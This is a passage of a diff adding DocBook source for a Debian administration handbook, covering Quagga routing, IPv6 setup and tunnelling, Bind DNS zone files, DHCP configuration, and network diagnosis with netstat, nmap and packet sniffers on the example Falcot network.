+		 <indexterm>
+			<primary><command>ripngd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>isisd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>babeld</command></primary>
+		</indexterm>
+		 <para>
+			Daemons are enabled by editing the <filename>/etc/quagga/daemons</filename> file and creating the appropriate configuration file in <filename>/etc/quagga/</filename>; this configuration file must be named after the daemon, with a <filename>.conf</filename> extension, and belong to the <literal>quagga</literal> user and the <literal>quaggavty</literal> group, in order for the <filename>/etc/init.d/quagga</filename> script to invoke the daemon.
+		</para>
+		 <para>
+			The configuration of each of these daemons requires knowledge of the routing protocol in question. These protocols cannot be described in detail here, but the <emphasis role="pkg">quagga-doc</emphasis> provides ample explanation in the form of an <command>info</command> file. The same contents may be more easily browsed as HTML on the Quagga website: <ulink type="block" url="http://www.nongnu.org/quagga/docs/docs-info.html" />
+		</para>
+		 <para>
+			In addition, the syntax is very close to a standard router's configuration interface, and network administrators will adapt quickly to <command>quagga</command>.
+		</para>
+		 <sidebar> <title><emphasis>IN PRACTICE</emphasis> OSPF, BGP or RIP?</title>
+		 <para>
+			OSPF is generally the best protocol to use for dynamic routing on private networks, but BGP is more common for Internet-wide routing. RIP is rather ancient, and hardly used anymore.
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.ipv6">
+		<title>IPv6</title>
+		 <para>
+			IPv6, successor to IPv4, is a new version of the IP protocol designed to fix its flaws, most notably the scarcity of available IP addresses. This protocol handles the network layer; its purpose is to provide a way to address machines, to convey data to their intended destination, and to handle data fragmentation if needed (in other words, to split packets into chunks with a size that depends on the network links to be used on the path and to reassemble the chunks in their proper order on arrival).
+		</para>
+		 <para>
+			Debian kernels include IPv6 handling in the core kernel (with the exception of some architectures that have it compiled as a module named <literal>ipv6</literal>). Basic tools such as <command>ping</command> and <command>traceroute</command> have their IPv6 equivalents in <command>ping6</command> and <command>traceroute6</command>, available respectively in the <emphasis role="pkg">iputils-ping</emphasis> and <emphasis role="pkg">iputils-tracepath</emphasis> packages.
+		</para>
+		 <indexterm>
+			<primary>IPv6</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="pkg">iputils-ping</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="pkg">iputils-tracepath</emphasis></primary>
+		</indexterm>
+		 <para>
+			The IPv6 network is configured similarly to IPv4, in <filename>/etc/network/interfaces</filename>. But if you want that network to be globally available, you must ensure that you have an IPv6-capable router relaying traffic to the global IPv6 network.
+		</para>
+		 <example id="example.network-interfaces-ipv6">
+			<title>Example of IPv6 configuration</title>
+			 
+<programlisting>
+iface eth0 inet6 static
+    address 2001:db8:1234:5::1:1
+    netmask 64
+    # Disabling auto-configuration
+    # autoconf 0
+    # The router is auto-configured and has no fixed address
+    # (accept_ra 1). If it had:
+    # gateway 2001:db8:1234:5::1
+</programlisting>
+
+		</example>
+		 <para>
+			IPv6 subnets usually have a netmask of 64 bits. This means that 2<superscript>64</superscript> distinct addresses exist within the subnet. This allows Stateless Address Autoconfiguration (<acronym>SLAAC</acronym>) to pick an address based on the network interface's MAC address. By default, if <acronym>SLAAC</acronym> is activated in your network and IPv6 on your computer, the kernel will automatically find IPv6 routers and configure the network interfaces.
+		</para>
+		 <para>
+			This behavior may have privacy implications. If you switch networks frequently, e.g. with a laptop, you might not want your <acronym>MAC</acronym> address being a part of your public IPv6 address. This makes it easy to identify the same device across networks. A solution to this are IPv6 privacy extensions (which Debian enables by default if IPv6 connectivity is detected during initial installation), which will assign an additional randomly generated address to the interface, periodically change them and prefer them for outgoing connections. Incoming connections can still use the address generated by SLAAC. The following example, for use in <filename>/etc/network/interfaces</filename>, activates these privacy extensions.
+		</para>
+		 <example id="example.network-interface-ipv6-privext">
+			<title>IPv6 privacy extensions</title>
+			 
+<programlisting>
+iface eth0 inet6 auto
+    # Prefer the randomly assigned addresses for outgoing connections.
+    privext 2
+</programlisting>
+
+		</example>
+		 <sidebar> <title><emphasis>TIP</emphasis> Programs built with IPv6</title>
+		 <para>
+			Many pieces of software need to be adapted to handle IPv6. Most of the packages in Debian have been adapted already, but not all. If your favorite package does not work with IPv6 yet, you can ask for help on the <emphasis>debian-ipv6</emphasis> mailing-list. They might know about an IPv6-aware replacement and could file a bug to get the issue properly tracked. <ulink type="block" url="http://lists.debian.org/debian-ipv6/" />
+		</para>
+		 </sidebar> <indexterm>
+			<primary>IPv6 firewall</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>firewall</primary>
+			<secondary>IPv6</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>ip6tables</command></primary>
+		</indexterm>
+		 <para>
+			IPv6 connections can be restricted, in the same fashion as for IPv4: the standard Debian kernels include an adaptation of <emphasis>netfilter</emphasis> for IPv6. This IPv6-enabled <emphasis>netfilter</emphasis> is configured in a similar fashion to its IPv4 counterpart, except the program to use is <command>ip6tables</command> instead of <command>iptables</command>.
+		</para>
+		 <section id="sect.ipv6-tunneling">
+			<title>Tunneling</title>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> IPv6 tunneling and firewalls</title>
+			 <para>
+				IPv6 tunneling over IPv4 (as opposed to native IPv6) requires the firewall to accept the traffic, which uses IPv4 protocol number 41.
+			</para>
+			 </sidebar> <para>
+				If a native IPv6 connection is not available, the fallback method is to use a tunnel over IPv4. Gogo6 is one (free) provider of such tunnels: <ulink type="block" url="http://www.gogo6.com/freenet6/tunnelbroker" />
+			</para>
+			 <indexterm>
+				<primary>Freenet6</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Gogo6</primary>
+			</indexterm>
+			 <para>
+				To use a Freenet6 tunnel, you need to register for a Freenet6 Pro account on the website, then install the <emphasis role="pkg">gogoc</emphasis> package and configure the tunnel. This requires editing the <filename>/etc/gogoc/gogoc.conf</filename> file: <literal>userid</literal> and <literal>password</literal> lines received by e-mail should be added, and <literal>server</literal> should be replaced with <literal>authenticated.freenet6.net</literal>.
+			</para>
+			 <para>
+				IPv6 connectivity is proposed to all machines on a local network by adding the three following directives to the <filename>/etc/gogoc/gogoc.conf</filename> file (assuming the local network is connected to the eth0 interface):
+			</para>
+			 
+<programlisting>
+host_type=router
+prefixlen=56
+if_prefix=eth0
+</programlisting>
+			 <para>
+				The machine then becomes the access router for a subnet with a 56-bit prefix. Once the tunnel is aware of this change, the local network must be told about it; this implies installing the <command>radvd</command> daemon (from the similarly-named package). This IPv6 configuration daemon has a role similar to <command>dhcpd</command> in the IPv4 world.
+			</para>
+			 <para>
+				The <filename>/etc/radvd.conf</filename> configuration file must then be created (see <filename>/usr/share/doc/radvd/examples/simple-radvd.conf</filename> as a starting point). In our case, the only required change is the prefix, which needs to be replaced with the one provided by Freenet6; it can be found in the output of the <command>ifconfig</command> command, in the block concerning the <literal>tun</literal> interface.
+			</para>
+			 <indexterm>
+				<primary><command>radvd</command></primary>
+			</indexterm>
+			 <para>
+				Then run <command>service gogoc restart</command> and <command>service radvd start</command>, and the IPv6 network should work.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.domain-name-servers">
+		<title>Domain Name Servers (DNS)</title>
+		 <section id="sect.dns-principe">
+			<title>Principle and Mechanism</title>
+			 <indexterm>
+				<primary>DNS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>server</primary>
+				<secondary>name</secondary>
+			</indexterm>
+			 <para>
+				The <emphasis>Domain Name Service</emphasis> (DNS) is a fundamental component of the Internet: it maps host names to IP addresses (and vice-versa), which allows the use of <literal>www.debian.org</literal> instead of <literal>5.153.231.4</literal> or <literal>2001:41c8:1000:21::21:4</literal>.
+			</para>
+			 <para>
+				DNS records are organized in zones; each zone matches either a domain (or a subdomain) or an IP address range (since IP addresses are generally allocated in consecutive ranges). A primary server is authoritative on the contents of a zone; secondary servers, usually hosted on separate machines, provide regularly refreshed copies of the primary zone.
+			</para>
+			 <indexterm>
+				<primary>zone</primary>
+				<secondary>DNS</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>DNS</primary>
+				<secondary>zone</secondary>
+			</indexterm>
+			 <para>
+				Each zone can contain records of various kinds (<emphasis>Resource Records</emphasis>):
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>A</literal>: IPv4 address. <indexterm><primary>A, DNS record</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>CNAME</literal>: alias (<emphasis>canonical name</emphasis>). <indexterm><primary>CNAME, DNS record</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>MX</literal>: <emphasis>mail exchange</emphasis>, an email server. This information is used by other email servers to find where to send email addressed to a given address. Each MX record has a priority. The highest-priority server (with the lowest number) is tried first (see sidebar <xref linkend="sidebar.smtp" />); other servers are contacted in order of decreasing priority if the first one does not reply. <indexterm><primary>MX</primary><secondary>DNS record</secondary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>PTR</literal>: mapping of an IP address to a name. Such a record is stored in a “reverse DNS” zone named after the IP address range. For example, <literal>1.168.192.in-addr.arpa</literal> is the zone containing the reverse mapping for all addresses in the <literal>192.168.1.0/24</literal> range. <indexterm><primary>PTR, DNS record</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>AAAA</literal>: IPv6 address. <indexterm><primary>AAAA, DNS record</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>NS</literal>: maps a name to a name server. Each domain must have at least one NS record. These records point at a DNS server that can answer queries concerning this domain; they usually point at the primary and secondary servers for the domain. These records also allow DNS delegation; for instance, the <literal>falcot.com</literal> zone can include an NS record for <literal>internal.falcot.com</literal>, which means that the <literal>internal.falcot.com</literal> zone is handled by another server. Of course, this server must declare an <literal>internal.falcot.com</literal> zone. <indexterm><primary>NS, DNS record</primary></indexterm>
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <indexterm>
+				<primary>record</primary>
+				<secondary>DNS</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>DNS record</primary>
+			</indexterm>
+			 <para>
+				The reference name server, Bind, was developed and is maintained by ISC (<emphasis>Internet Software Consortium</emphasis>). It is provided in Debian by the <emphasis role="pkg">bind9</emphasis> package. Version 9 brings two major changes compared to previous versions. First, the DNS server can now run under an unprivileged user, so that a security vulnerability in the server does not grant root privileges to the attacker (as was seen repeatedly with versions 8.x).
+			</para>
+			 <para>
+				Furthermore, Bind supports the DNSSEC standard for signing (and therefore authenticating) DNS records, which allows blocking any spoofing of this data during man-in-the-middle attacks.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">bind9</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>ISC</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Internet Software Consortium</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> DNSSEC</title>
+			 <indexterm>
+				<primary>DNSSEC</primary>
+			</indexterm>
+			 <para>
+				The DNSSEC norm is quite complex; this partly explains why it is not in widespread usage yet (even if it perfectly coexists with DNS servers unaware of DNSSEC). To understand all the ins and outs, you should check the following article. <ulink type="block" url="http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions" />
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.dns-config">
+			<title>Configuring</title>
+			 <para>
+				Configuration files for <command>bind</command>, irrespective of version, have the same structure.
+			</para>
+			 <para>
+				The Falcot administrators created a primary <literal>falcot.com</literal> zone to store information related to this domain, and a <literal>168.192.in-addr.arpa</literal> zone for reverse mapping of IP addresses in the local networks.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Names of reverse zones</title>
+			 <indexterm>
+				<primary>zone</primary>
+				<secondary>reverse</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>reverse zone</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>in-addr.arpa</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>ip6.arpa</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>nibble format</primary>
+			</indexterm>
+			 <para>
+				Reverse zones have a particular name. The zone covering the <literal>192.168.0.0/16</literal> network needs to be named <literal>168.192.in-addr.arpa</literal>: the IP address components are reversed, and followed by the <literal>in-addr.arpa</literal> suffix.
+			</para>
+			 <para>
+				For IPv6 networks, the suffix is <literal>ip6.arpa</literal> and the IP address components which are reversed are each character in the full hexadecimal representation of the IP address. As such, the <literal>2001:0bc8:31a0::/48</literal> network would use a zone named <literal>0.a.1.3.8.c.b.0.1.0.0.2.ip6.arpa</literal>.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>TIP</emphasis> Testing the DNS server</title>
+			 <para>
+				The <command>host</command> command (in the <emphasis role="pkg">bind9-host</emphasis> package) queries a DNS server, and can be used to test the server configuration. For example, <command>host machine.falcot.com localhost</command> checks the local server's reply for the <literal>machine.falcot.com</literal> query. <command>host <replaceable>ipaddress</replaceable> localhost</command> tests the reverse resolution.
+			</para>
+			 <indexterm>
+				<primary><command>host</command></primary>
+			</indexterm>
+			 </sidebar> <para>
+				The following configuration excerpts, taken from the Falcot files, can serve as starting points to configure a DNS server:
+			</para>
+			 <indexterm>
+				<primary><filename>named.conf</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/bind/named.conf</filename></primary>
+			</indexterm>
+			 <example id="example.bind-named.conf.local">
+				<title>Excerpt of <filename>/etc/bind/named.conf.local</filename></title>
+				 
+<programlisting>
+zone "falcot.com" {
+        type master;
+        file "/etc/bind/db.falcot.com";
+        allow-query { any; };
+        allow-transfer {
+                195.20.105.149/32 ; // ns0.xname.org
+                193.23.158.13/32 ; // ns1.xname.org
+        };
+};
+
+zone "internal.falcot.com" {
+        type master;
+        file "/etc/bind/db.internal.falcot.com";
+        allow-query { 192.168.0.0/16; };
+};
+
+zone "168.192.in-addr.arpa" {
+        type master;
+        file "/etc/bind/db.192.168";
+        allow-query { 192.168.0.0/16; };
+};
+</programlisting>
+
+			</example>
+			 <example id="example.bind-db.falcot.com">
+				<title>Excerpt of <filename>/etc/bind/db.falcot.com</filename></title>
+				 
+<programlisting>; falcot.com Zone 
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+;
+; The @ refers to the zone name ("falcot.com" here)
+; or to $ORIGIN if that directive has been used
+;
+@       IN      NS      ns
+@       IN      NS      ns0.xname.org.
+
+internal IN      NS      192.168.0.2
+
+@       IN      A       212.94.201.10
+@       IN      MX      5 mail
+@       IN      MX      10 mail2
+
+ns      IN      A       212.94.201.10
+mail    IN      A       212.94.201.10
+mail2   IN      A       212.94.201.11
+www     IN      A       212.94.201.11
+
+dns     IN      CNAME   ns
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Syntax of a name</title>
+			 <para>
+				The syntax of machine names follows strict rules. For instance, <literal>machine</literal> implies <literal>machine.<replaceable>domain</replaceable></literal>. If the domain name should not be appended to a name, said name must be written as <literal>machine.</literal> (with a dot as suffix). Indicating a DNS name outside the current domain therefore requires a syntax such as <literal>machine.otherdomain.com.</literal> (with the final dot).
+			</para>
+			 </sidebar> <example id="example.bind-db.192.168">
+				<title>Excerpt of <filename>/etc/bind/db.192.168</filename></title>
+				 
+<programlisting>; Reverse zone for 192.168.0.0/16
+; admin.falcot.com. =&gt; zone contact: admin@falcot.com
+$TTL    604800
+@       IN      SOA     ns.internal.falcot.com. admin.falcot.com. (
+                        20040121        ; Serial
+                         604800         ; Refresh
+                          86400         ; Retry
+                        2419200         ; Expire
+                         604800 )       ; Negative Cache TTL
+
+        IN      NS      ns.internal.falcot.com.
+
+; 192.168.0.1 -&gt; arrakis
+1.0     IN      PTR     arrakis.internal.falcot.com.
+; 192.168.0.2 -&gt; neptune
+2.0     IN      PTR     neptune.internal.falcot.com.
+
+; 192.168.3.1 -&gt; pau
+1.3     IN      PTR     pau.internal.falcot.com.
+</programlisting>
+
+			</example>
+
+		</section>
+
+	</section>
+	 <section id="sect.dhcp">
+		<title>DHCP</title>
+		 <para>
+			DHCP (for <emphasis>Dynamic Host Configuration Protocol</emphasis>) is a protocol by which a machine can automatically get its network configuration when it boots. This allows centralizing the management of network configurations, and ensuring that all desktop machines get similar settings.
+		</para>
+		 <indexterm>
+			<primary>DHCP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Dynamic Host Configuration Protocol</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>network</primary>
+			<secondary>DHCP configuration</secondary>
+		</indexterm>
+		 <para>
+			A DHCP server provides many network-related parameters. The most common of these is an IP address and the network where the machine belongs, but it can also provide other information, such as DNS servers, WINS servers, NTP servers, and so on.
+		</para>
+		 <para>
+			The Internet Software Consortium (also involved in developing <command>bind</command>) is the main author of the DHCP server. The matching Debian package is <emphasis role="pkg">isc-dhcp-server</emphasis>.
+		</para>
+		 <section id="sect.dhcp-config">
+			<title>Configuring</title>
+			 <para>
+				The first elements that need to be edited in the DHCP server configuration file (<filename>/etc/dhcp/dhcpd.conf</filename>) are the domain name and the DNS servers. If this server is alone on the local network (as defined by the broadcast propagation), the <literal>authoritative</literal> directive must also be enabled (or uncommented). One also needs to create a <literal>subnet</literal> section describing the local network and the configuration information to be provided. The following example fits a <literal>192.168.0.0/24</literal> local network with a router at <literal>192.168.0.1</literal> serving as the gateway. Available IP addresses are in the range <literal>192.168.0.128</literal> to <literal>192.168.0.254</literal>.
+			</para>
+			 <example id="example.dhcp-dhcpd.conf">
+				<title>Excerpt of <filename>/etc/dhcp/dhcpd.conf</filename></title>
+				 
+<programlisting>
+#
+# Sample configuration file for ISC dhcpd for Debian
+#
+
+# The ddns-updates-style parameter controls whether or not the server will
+# attempt to do a DNS update when a lease is confirmed. We default to the
+# behavior of the version 2 packages ('none', since DHCP v2 didn't
+# have support for DDNS.)
+ddns-update-style interim;
+
+# option definitions common to all supported networks...
+option domain-name "internal.falcot.com";
+option domain-name-servers ns.internal.falcot.com;
+
+default-lease-time 600;
+max-lease-time 7200;
+
+# If this DHCP server is the official DHCP server for the local
+# network, the authoritative directive should be uncommented.
+authoritative;
+
+# Use this to send dhcp log messages to a different log file (you also
+# have to hack syslog.conf to complete the redirection).
+log-facility local7;
+
+# My subnet
+subnet 192.168.0.0 netmask 255.255.255.0 {
+    option routers 192.168.0.1;
+    option broadcast-address 192.168.0.255;
+    range 192.168.0.128 192.168.0.254;
+    ddns-domainname "internal.falcot.com";
+}
+</programlisting>
+
+			</example>
+
+		</section>
+		 <section id="sect.dhcp-dns">
+			<title>DHCP and DNS</title>
+			 <indexterm>
+				<primary>DNS</primary>
+				<secondary>automated updates</secondary>
+			</indexterm>
+			 <para>
+				A nice feature is the automated registering of DHCP clients in the DNS zone, so that each machine gets a significant name (rather than something impersonal such as <literal>machine-192-168-0-131.internal.falcot.com</literal>). Using this feature requires configuring the DNS server to accept updates to the <literal>internal.falcot.com</literal> DNS zone from the DHCP server, and configuring the latter to submit updates for each registration.
+			</para>
+			 <para>
+				In the <command>bind</command> case, the <literal>allow-update</literal> directive needs to be added to each of the zones that the DHCP server is to edit (the one for the <literal>internal.falcot.com</literal> domain, and the reverse zone). This directive lists the IP addresses allowed to perform these updates; it should therefore contain the possible addresses of the DHCP server (both the local address and the public address, if appropriate).
+			</para>
+			 
+<programlisting>
+allow-update { 127.0.0.1 192.168.0.1 212.94.201.10 !any };
+</programlisting>
+			 <para>
+				Beware! A zone that can be modified <emphasis>will</emphasis> be changed by <command>bind</command>, and the latter will overwrite its configuration files at regular intervals. Since this automated procedure produces files that are less human-readable than manually-written ones, the Falcot administrators handle the <literal>internal.falcot.com</literal> domain with a delegated DNS server; this means the <literal>falcot.com</literal> zone file stays firmly under their manual control.
+			</para>
+			 <para>
+				The DHCP server configuration excerpt above already includes the directives required for DNS zone updates: they are the <literal>ddns-update-style interim;</literal> and <literal>ddns-domain-name "internal.falcot.com";</literal> lines in the block describing the subnet.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.network-diagnosis-tools">
+		<title>Network Diagnosis Tools</title>
+		 <para>
+			When a network application does not run as expected, it is important to be able to look under the hood. Even when everything seems to run smoothly, running a network diagnosis can help ensure everything is working as it should. Several diagnosis tools exists for this purpose; each one operates on a different level.
+		</para>
+		 <section id="sect.netstat">
+			<title>Local Diagnosis: <command>netstat</command></title>
+			 <indexterm>
+				<primary><command>netstat</command></primary>
+			</indexterm>
+			 <para>
+				Let's first mention the <command>netstat</command> command (in the <emphasis role="pkg">net-tools</emphasis> package); it displays an instant summary of a machine's network activity. When invoked with no argument, this command lists all open connections; this list can be very verbose since it includes many Unix-domain sockets (widely used by daemons) which do not involve the network at all (for example, <literal>dbus</literal> communication, <literal>X11</literal> traffic, and communications between virtual filesystems and the desktop).
+			</para>
+			 <para>
+				Common invocations therefore use options that alter <command>netstat</command>'s behavior. The most frequently used options include:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>-t</literal>, which filters the results to only include TCP connections;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>-u</literal>, which works similarly for UDP connections; these options are not mutually exclusive, and one of them is enough to stop displaying Unix-domain connections;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>-a</literal>, to also list listening sockets (waiting for incoming connections);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>-n</literal>, to display the results numerically: IP addresses (no DNS resolution), port numbers (no aliases as defined in <filename>/etc/services</filename>) and user ids (no login names);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>-p</literal>, to list the processes involved; this option is only useful when <command>netstat</command> is run as root, since normal users will only see their own processes;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>-c</literal>, to continuously refresh the list of connections.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Other options, documented in the <citerefentry><refentrytitle>netstat</refentrytitle>
+				 <manvolnum>8</manvolnum></citerefentry> manual page, provide an even finer control over the displayed results. In practice, the first five options are so often used together that systems and network administrators practically acquired <command>netstat -tupan</command> as a reflex. Typical results, on a lightly loaded machine, may look like the following:
+			</para>
+			 
+<screen role="scale">
+<computeroutput># </computeroutput><userinput>netstat -tupan</userinput>
+<computeroutput>Active Internet connections (servers and established)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      397/rpcbind     
+tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      431/sshd        
+tcp        0      0 0.0.0.0:36568           0.0.0.0:*               LISTEN      407/rpc.statd   
+tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      762/exim4       
+tcp        0    272 192.168.1.242:22        192.168.1.129:44452     ESTABLISHED 1172/sshd: roland [
+tcp6       0      0 :::111                  :::*                    LISTEN      397/rpcbind     
+tcp6       0      0 :::22                   :::*                    LISTEN      431/sshd        
+tcp6       0      0 ::1:25                  :::*                    LISTEN      762/exim4       
+tcp6       0      0 :::35210                :::*                    LISTEN      407/rpc.statd   
+udp        0      0 0.0.0.0:39376           0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:996             0.0.0.0:*                           397/rpcbind     
+udp        0      0 127.0.0.1:1007          0.0.0.0:*                           407/rpc.statd   
+udp        0      0 0.0.0.0:68              0.0.0.0:*                           916/dhclient    
+udp        0      0 0.0.0.0:48720           0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:111             0.0.0.0:*                           397/rpcbind     
+udp        0      0 192.168.1.242:123       0.0.0.0:*                           539/ntpd        
+udp        0      0 127.0.0.1:123           0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:123             0.0.0.0:*                           539/ntpd        
+udp        0      0 0.0.0.0:5353            0.0.0.0:*                           451/avahi-daemon: r
+udp        0      0 0.0.0.0:39172           0.0.0.0:*                           407/rpc.statd   
+udp6       0      0 :::996                  :::*                                397/rpcbind     
+udp6       0      0 :::34277                :::*                                407/rpc.statd   
+udp6       0      0 :::54852                :::*                                916/dhclient    
+udp6       0      0 :::111                  :::*                                397/rpcbind     
+udp6       0      0 :::38007                :::*                                451/avahi-daemon: r
+udp6       0      0 fe80::5054:ff:fe99::123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:a:123 :::*                                539/ntpd        
+udp6       0      0 2001:bc8:3a7e:210:5:123 :::*                                539/ntpd        
+udp6       0      0 ::1:123                 :::*                                539/ntpd        
+udp6       0      0 :::123                  :::*                                539/ntpd        
+udp6       0      0 :::5353                 :::*                                451/avahi-daemon: r
+</computeroutput></screen>
+			 <para>
+				As expected, this lists established connections, two SSH connections in this case, and applications waiting for incoming connections (listed as <literal>LISTEN</literal>), notably the Exim4 email server listening on port 25.
+			</para>
+
+		</section>
+		 <section id="sect.nmap">
+			<title>Remote Diagnosis: <command>nmap</command></title>
+			 <indexterm>
+				<primary><command>nmap</command></primary>
+			</indexterm>
+			 <para>
+				<command>nmap</command> (in the similarly-named package) is, in a way, the remote equivalent for <command>netstat</command>. It can scan a set of “well-known” ports for one or several remote servers, and list the ports where an application is found to answer to incoming connections. Furthermore, <command>nmap</command> is able to identify some of these applications, sometimes even their version number. The counterpart of this tool is that, since it runs remotely, it cannot provide information on processes or users; however, it can operate on several targets at once.
+			</para>
+			 <para>
+				A typical <command>nmap</command> invocation only uses the <literal>-A</literal> option (so that <command>nmap</command> attempts to identify the versions of the server software it finds) followed by one or more IP addresses or DNS names of machines to scan. Again, many more options exist to finely control the behavior of <command>nmap</command>; please refer to the documentation in the <citerefentry> <refentrytitle>nmap</refentrytitle>
+				 <manvolnum>1</manvolnum> </citerefentry> manual page.
+			</para>
+			 
+<screen role="scale" width="80">
+<computeroutput># </computeroutput><userinput>nmap mirtuel</userinput>
+<computeroutput>
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for mirtuel (192.168.1.242)
+Host is up (0.000013s latency).
+rDNS record for 192.168.1.242: mirtuel.internal.placard.fr.eu.org
+Not shown: 998 closed ports
+PORT    STATE SERVICE
+22/tcp  open  ssh
+111/tcp open  rpcbind
+
+Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds
+# </computeroutput><userinput>nmap -A localhost</userinput>
+<computeroutput>
+Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:46 CET
+Nmap scan report for localhost (127.0.0.1)
+Host is up (0.000013s latency).
+Other addresses for localhost (not scanned): 127.0.0.1
+Not shown: 997 closed ports
+PORT    STATE SERVICE VERSION
+22/tcp  open  ssh     OpenSSH 6.7p1 Debian 3 (protocol 2.0)
+|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
+25/tcp  open  smtp    Exim smtpd 4.84
+| smtp-commands: mirtuel Hello localhost [127.0.0.1], SIZE 52428800, 8BITMIME, PIPELINING, HELP, 
+|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 
+111/tcp open  rpcbind 2-4 (RPC #100000)
+| rpcinfo: 
+|   program version   port/proto  service
+|   100000  2,3,4        111/tcp  rpcbind
+|   100000  2,3,4        111/udp  rpcbind
+|   100024  1          36568/tcp  status
+|_  100024  1          39172/udp  status
+Device type: general purpose
+Running: Linux 3.X
+OS CPE: cpe:/o:linux:linux_kernel:3
+OS details: Linux 3.7 - 3.15
+Network Distance: 0 hops
+Service Info: Host: mirtuel; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds
+</computeroutput></screen>
+			 <para>
+				As expected, the SSH and Exim4 applications are listed. Note that not all applications listen on all IP addresses; since Exim4 is only accessible on the <literal>lo</literal> loopback interface, it only appears during an analysis of <literal>localhost</literal> and not when scanning <literal>mirtuel</literal> (which maps to the <literal>eth0</literal> interface on the same machine).
+			</para>
+
+		</section>
+		 <section id="sect.sniffers">
+			<title>Sniffers: <command>tcpdump</command> and <command>wireshark</command></title>
+			 <para>
+				Sometimes, one needs to look at what actually goes on the wire, packet by packet. These cases call for a “frame analyzer”, more widely known as a <emphasis>sniffer</emphasis>. Such a tool observes all the packets that reach a given network interface, and displays them in a user-friendly way.
+			</para>
+			 <indexterm>
+				<primary><command>tcpdump</command></primary>
+			</indexterm>
+			 <para>
+				The venerable tool in this domain is <command>tcpdump</command>, available as a standard tool on a wide range of platforms. It allows many kinds of network traffic capture, but the representation of this traffic stays rather obscure. We will therefore not describe it in further detail.
+			</para>
+			 <indexterm>
+				<primary><command>wireshark</command></primary>
+			</indexterm>
+			 <para>
+				A more recent (and more modern) tool, <command>wireshark</command> (in the <emphasis role="pkg">wireshark</emphasis> package), has become the new reference in network traffic analysis due to its many decoding modules that allow for a simplified analysis of the captured packets. The packets are displayed graphically with an organization based on the protocol layers. This allows a user to visualize all protocols involved in a packet. For example, given a packet containing an HTTP request, <command>wireshark</command> displays, separately, the information concerning the physical layer, the Ethernet layer, the IP packet information, the TCP connection parameters, and finally the HTTP request itself.
+			</para>
+			 <figure id="figure.wireshark">
+				<title>The <command>wireshark</command> network traffic analyzer</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/wireshark.png" format="PNG" scalefit="1" width="75%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
